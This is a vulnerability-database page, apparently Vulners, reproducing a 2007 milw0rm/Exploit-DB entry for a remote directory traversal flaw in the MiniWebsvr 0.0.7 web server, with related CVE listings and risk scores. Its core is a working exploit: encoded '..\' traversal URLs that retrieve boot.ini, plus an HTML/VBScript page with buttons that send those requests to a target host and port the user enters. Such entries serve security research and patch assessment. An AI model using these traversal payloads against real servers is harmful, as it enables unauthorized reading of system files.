Lucene search
+L

MiniWebsvr 0.0.7 - Remote Directory Traversal

🗓️ 11 Apr 2007 00:00:00Reported by shinnaiType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 45 Views

MiniWebsvr 0.0.7 - Remote Directory Traversal vulnerability affecting http://miniwebsvr.sourceforge.net

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2007-0919
3 Mar 200800:00
circl
cve
CVE
CVE-2007-0919
14 Feb 200711:00
cve
cvelist
Cvelist
CVE-2007-0919
14 Feb 200711:00
cvelist
exploitdb
Exploit DB
MiniWebsvr 0.0.9a - Remote Directory Traversal
3 Mar 200800:00
exploitdb
euvd
EUVD
EUVD-2007-0913
7 Oct 202500:30
euvd
nvd
NVD
CVE-2007-0919
14 Feb 200711:28
nvd
prion
Prion
Directory traversal
14 Feb 200711:28
prion
securityvulns
securityvulns
Miniwebsvr web server directory traversal
13 Feb 200700:00
securityvulns
<pre>
<code><span style="font: 10pt Courier New;"><span class="general1-symbol">-------------------------------------------------------------
<b>MiniWebsvr 0.0.7 Directory transversal vulnerability</b>
url: http://miniwebsvr.sourceforge.net/
author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org

http://localhost/%5C..%5C..%5C..%5C..%5C..%5C../boot.ini or
http://localhost/%5C..%5C..%5C..%5C..%5C..%5C../
-------------------------------------------------------------

Host			Port
<input type=text name=txtIP value = "localhost">	<input type=text name=txtPort value = "8080">

<input language=VBScript onclick=GetBoot() type=button value="Click to get boot.ini">

<input language=VBScript onclick=BrowseMe() type=button value="Click to browse">

<script language='vbscript'>
Sub GetBoot
  on error resume next
  document.location = "http://" + txtIP.value + ":" + txtPort.value + "/%5C..%5C..%5C..%5C..%5C..%5C../boot.ini"
end sub

Sub BrowseMe
  on error resume next
  document.location = "http://" + txtIP.value + ":" + txtPort.value + "/%5C..%5C..%5C..%5C..%5C..%5C../"
end sub
</script>
</span></span>
</code></pre>

# milw0rm.com [2007-04-11]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

26 Sep 2016 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.8
EPSS0.03648
45